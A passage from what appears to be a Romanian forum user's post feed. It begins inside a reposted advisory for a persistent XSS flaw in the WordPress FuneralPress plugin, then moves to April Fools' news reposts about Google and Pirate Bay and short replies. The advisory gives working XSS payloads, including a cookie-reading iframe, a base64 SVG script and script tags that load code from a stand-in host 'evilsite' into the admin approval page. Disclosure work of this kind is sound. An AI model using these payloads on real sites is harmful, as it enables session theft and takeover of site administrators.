http://site/obituaries/?id=1&f=guestbook&m=addand submits the form with the following entered into < textarea name="message" style="width:98%;height:170px" id="wpfh_message_ textarea"></textarea> : Poor Peter was a fine old chap, such a pity he was eaten to death by a pack of wild children. <IFRAME SRC="javascript:document.write('xss cookie: ' + document.cookie);"></IFRAME> <EMBED SRC="data:image/svg+xml ;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZW NtYXNjcmlwdCI+YWxlcnQoInhzcyBhbGVydCIpPC9zY3JpcHQ+PC9zdmc+Cg==" type="image/ svg+xml" AllowScriptAccess="always"></EMBED> 2. Site administrator browses to http://site/wp-admin/admin.php?page= wpfh-guestbook, sees an entry with a message preview that reads "Poor Peter was a fine old chap..." and approves it. 3. Anyone browsing to http://site/obituaries/?id=1+&f=guestbook will execute the injected script The xss flaws in <textarea name="photo-message"> and <textarea name="youtube-message"> are more serious, as scripts injected here are served up to the admin user when they attempt to approve the guestbook comments at http://site/wp -admin/admin.php?page=wpfh-guestbook As with the regular guestbook messages, if the admin approves a malicious photo or youtube message the script will be executed by anyone browsing to the guestbook. ## photo/youtube post example: 1. Attacker hosts malicious javascript on another site: http://evilsite/fp.js : document.getElementById("topmenu").innerHTML="<h1>XSS</h1>"; //rewrite admin page http://evilsite/doc.js : document.write("document.write XSS");alert("XSS"); 2. Attacker browses to: http://site/obituaries/?id=1&f=guestbook&m=addand selects either the "Photo" or " Youtube" guestbook message option 3. If Photo was selected, the attacker enters a path to a local image in <input type="file" name="photo" id="wpfh_message_file">. Otherwise they enter a Youtube link into <input type="text" name="youtube" style="width:95%" id="wpfh_message_youtube" value=""> 4. Depending on which type of message was selected, the attacker submits the form with the following entered into <textareastyle="width:100%;height:70px" name="photo-message"></ textarea> or <textarea style="width:100%;height:70px" name="youtube -message"></textarea> : <SCRIPT SRC=http://evilsite/fp.js></SCRIPT> <SCRIPT SRC=http://evilsite/doc.js></SCRIPT> 5. The site administrator browses to http://site/wp-admin/admin.php ?page=wpfh-guestbook and the scripts that have been injected into <table class="wp-list-table widefat fixed posts" cellspacing="0"> are executed: <td style="background-color:#ffd1d1 !important" > <a href="http://www.youtube.com/watch?v=tsLkL8DTHeg" target="_blank">View Video</a><br><SCRIPT SRC=http://evilsite/fp.js ></SCRIPT> <SCRIPT SRC=http://evilsite/doc.js></SCRIPT> </td> Sursa: Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS
  21. Kwelwild
    Pacaleli de 1 aprilie. Google a anuntat ca inchide Youtube si va lansa 3 aplicatii noi. Nici Google nu a uitat de 1 APRILIE si le-a pregatit utilizatorilor sai mai multe surprize cu adevarat amuzante. Prima este lansarea unei noi aplicatii, denumite GOOGLE NOSE. Aplicatia, aparuta special ca o FARSA DE 1 APRILIE, ii va ajuta pe utilizatori sa afle ce floare au in fata in functie de miros, dar si ce fel de mancare este gatita atunci cand intra intr-un apartament. In prezentarea aplicatiei, Google a specificat faptul ca folosindu-te de Nose, poti identifica dupa miros "o masina noua, interiorul unui mormand egiptean sau o fantoma". A doua PACALEALA DE 1 APRILIE de la Google este lansarea unui noul Gmail, denumit Blue: "Va fi la fel ca si Gmail-ul vechi, doar ca albastru". Nici cei care folosesc Google Maps nu au scapat de farse in aceasta dimineata. Google a pregatit de 1 APRILIE serviciul "Google Treasure Maps", pentru toti utilizatorii Google Maps. Trecem insa si la subiecte mai sensibile si nu doar amuzante. Si asta pentru ca Google a anuntat printr-un clip postat azi noapte ca va inchide YouTube, iar ca ultim gest fata de milioanele de utilizatori, va selecta cel mai bun clip postat vreodata pe reteaua de streaming video. Clipul cu anuntul facut de oficialii de la Youtube a fost vizionat peste noapte de aproape 400.000 de persoane. Sursa: Pacaleli de 1 aprilie. Google a anuntat ca inchide Youtube si va lansa 3 aplicatii noi. VIDEO - www.yoda.ro
  22. Kwelwild
    Pirate Bay, anunt facut un urma cu putin timp: Piratii spun ca se muta din Coreea de Nord Azi e 1 aprilie, iar anuntul facut pe Facebook de Pirate Bay se inscrie in aceasta linie Piratii de la Pirate Bay au anuntat luni la pranz pe contul lor de Facebook ca planuiesc sa se mute in SUA din Coreea de Nord. Povesti cu Pirate Bay si Coreea de Nord au aparut si la inceputul lui martie si s-au dovedit fi false. Iata anuntul postat pe pagina de Facebook a site-ului de torrente. You probably heard about our recent move to North Korea. Many of you rightfully bashed us for siding with a dictatorship. We want you to know that we have listened to your critique. So without further due, we hereby announce that we have moved our servers from the evil North Korea to the greatest fuckin nation in the entire world. The United States of America, fuck yeah! We have worked closely with the awesome american government to establish a strong military graded server park that will endure any nuclear attacks that Kim Jong Un and his evil allies might send at Us. Along with this move to the greatest fuckin country in the universe, we will soon remove all torrents from North Korea, China, Iran, France and Islamistan. American torrents will be seeded with extra power, to ensure that you'll get your american dose extra fast. America, fuck yeah! Sursa: Pirate Bay, anunt facut un urma cu putin timp: Piratii spun ca se muta din Coreea de Nord - www.yoda.ro
  23. Kwelwild
    Frumos, dar devine nasol
  24. Kwelwild
    Cand un site e pe mana lui ps, nu stiu cine ar putea da deface. Cu ocazia asta mi-am amintit si eu de 1 aprilie!
  25. Kwelwild
    Mi se pare o prostie si o pierdere de timp..o farsa de tot rasul (asta pentru ca a fost anuntata).
×
×
  • Create New...